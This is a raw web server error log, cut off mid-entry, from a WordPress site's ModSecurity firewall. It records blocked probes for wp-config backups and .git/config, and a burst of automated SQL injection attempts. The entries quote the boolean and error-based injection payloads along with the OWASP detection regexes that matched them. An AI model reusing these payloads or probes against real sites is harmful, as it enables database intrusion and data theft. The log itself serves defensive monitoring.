77.111.247.44] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZpCx9HMvHnWd_MtvNoHDIgAAAEs"] [Fri Jul 12 00:31:04.856291 2024] [authz_core:error] [pid 22103:tid 140073630684928] [client 172.105.197.17:58416] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/12 00:31:09 [error] 25554#25554: *20891 access forbidden by rule, client: 172.105.197.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Jul 12 03:09:24.715718 2024] [ssl:warn] [pid 29082:tid 140613607004032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 12 03:09:36.965583 2024] [ssl:warn] [pid 29083:tid 140613607004032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 12 03:09:37.499197 2024] [ssl:warn] [pid 29083:tid 140613607004032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 12 03:09:39.252737 2024] [ssl:warn] [pid 29083:tid 140613607004032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 12 03:09:41.548246 2024] [ssl:warn] [pid 29497:tid 139784115570560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 12 03:09:49.773679 2024] [ssl:warn] [pid 29500:tid 139784115570560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 12 08:35:49.759852 2024] [:error] [pid 29519:tid 139783770715904] [client 141.98.81.44:37888] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 8428= found within ARGS:ver: 1.8.5.47) AND 8428=9030 AND (6745=6745"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExNTEhNOprNgeRyDcP4gAAAIs"] [Fri Jul 12 08:35:50.134042 2024] [:error] [pid 30143:tid 139783745537792] [client 141.98.81.44:37890] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5446= found within ARGS:ver: 1.8.5.47) AND 5446=5446 AND (5296=5296"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExNhoAeojmxWlFps7wfAAAAM4"] [Fri Jul 12 08:35:50.383956 2024] [:error] [pid 30143:tid 139783703574272] [client 141.98.81.44:37892] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 2164= found within ARGS:ver: 1.8.5.47 AND 2164=7773"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExNhoAeojmxWlFps7wfQAAANM"] [Fri Jul 12 08:35:50.647273 2024] [:error] [pid 29518:tid 139783661610752] [client 141.98.81.44:37896] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5446= found within ARGS:ver: 1.8.5.47 AND 5446=5446"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExNqg1rY6w-xq1eShSSAAAAFg"] [Fri Jul 12 08:35:50.956332 2024] [:error] [pid 29518:tid 139783899252480] [client 141.98.81.44:37900] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 8637= found within ARGS:ver: 1.8.5.47') AND 8637=1171 AND ('FHzE'='FHzE"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExNqg1rY6w-xq1eShSSQAAAEQ"] [Fri Jul 12 08:35:51.203008 2024] [:error] [pid 29519:tid 139783762323200] [client 141.98.81.44:37902] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5446= found within ARGS:ver: 1.8.5.47') AND 5446=5446 AND ('WbVX'='WbVX"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExNzEhNOprNgeRyDcP4wAAAIw"] [Fri Jul 12 08:35:51.460231 2024] [:error] [pid 30143:tid 139783686788864] [client 141.98.81.44:37908] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 6910= found within ARGS:ver: 1.8.5.47' AND 6910=4244 AND 'aPLr'='aPLr"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExNxoAeojmxWlFps7wfgAAANU"] [Fri Jul 12 08:35:51.768219 2024] [:error] [pid 29518:tid 139783890859776] [client 141.98.81.44:37910] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5446= found within ARGS:ver: 1.8.5.47' AND 5446=5446 AND 'ruuR'='ruuR"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExN6g1rY6w-xq1eShSSwAAAEU"] [Fri Jul 12 08:35:52.066262 2024] [:error] [pid 30143:tid 139783670003456] [client 141.98.81.44:37912] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 8687= found within ARGS:ver: 1.8.5.47%' AND 8687=9538 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOBoAeojmxWlFps7wfwAAANc"] [Fri Jul 12 08:35:52.325478 2024] [:error] [pid 30143:tid 139783711966976] [client 141.98.81.44:37914] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5446= found within ARGS:ver: 1.8.5.47%' AND 5446=5446 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOBoAeojmxWlFps7wgAAAANI"] [Fri Jul 12 08:35:52.641355 2024] [:error] [pid 30143:tid 139783661610752] [client 141.98.81.44:37916] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7529= found within ARGS:ver: 1.8.5.47 AND 7529=2291-- WQfU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOBoAeojmxWlFps7wgQAAANg"] [Fri Jul 12 08:35:52.940817 2024] [:error] [pid 29517:tid 139783728752384] [client 141.98.81.44:37918] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5446= found within ARGS:ver: 1.8.5.47 AND 5446=5446-- CmPI"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOPUCh5vf5PuAcijj7gAAABA"] [Fri Jul 12 08:35:53.323525 2024] [:error] [pid 29518:tid 139783804286720] [client 141.98.81.44:37920] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOag1rY6w-xq1eShSTAAAAEc"] [Fri Jul 12 08:35:53.606198 2024] [:error] [pid 29518:tid 139783779108608] [client 141.98.81.44:37922] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOag1rY6w-xq1eShSTQAAAEo"] [Fri Jul 12 08:35:54.080205 2024] [:error] [pid 29518:tid 139783762323200] [client 141.98.81.44:37924] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7171626a71 found within ARGS:ver: 1.8.5.47) AND (SELECT 6749 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6749=6749,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1730=1730"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOqg1rY6w-xq1eShSTgAAAEw"] [Fri Jul 12 08:35:54.434709 2024] [:error] [pid 29517:tid 139783678396160] [client 141.98.81.44:37926] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7171626a71 found within ARGS:ver: 1.8.5.47 AND (SELECT 6749 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6749=6749,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOvUCh5vf5PuAcijj7wAAABY"] [Fri Jul 12 08:35:54.684728 2024] [:error] [pid 30143:tid 139783695181568] [client 141.98.81.44:37928] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7171626a71 found within ARGS:ver: 1.8.5.47') AND (SELECT 6749 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6749=6749,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('yIiD'='yIiD"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOhoAeojmxWlFps7wggAAANQ"] [Fri Jul 12 08:35:54.941085 2024] [:error] [pid 30143:tid 139783795894016] [client 141.98.81.44:37930] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7171626a71 found within ARGS:ver: 1.8.5.47' AND (SELECT 6749 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6749=6749,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'SNXg'='SNXg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOhoAeojmxWlFps7wgwAAAMg"] [Fri Jul 12 08:35:55.307548 2024] [:error] [pid 29519:tid 139783795894016] [client 141.98.81.44:37932] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7171626a71 found within ARGS:ver: 1.8.5.47%' AND (SELECT 6749 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6749=6749,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOzEhNOprNgeRyDcP5AAAAIg"] [Fri Jul 12 08:35:55.605444 2024] [:error] [pid 29519:tid 139783882467072] [client 141.98.81.44:37934] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7171626a71 found within ARGS:ver: 1.8.5.47 AND (SELECT 6749 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6749=6749,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- BgQp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOzEhNOprNgeRyDcP5QAAAIY"] [Fri Jul 12 08:35:55.924473 2024] [:error] [pid 30143:tid 139783678396160] [client 141.98.81.44:37936] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] 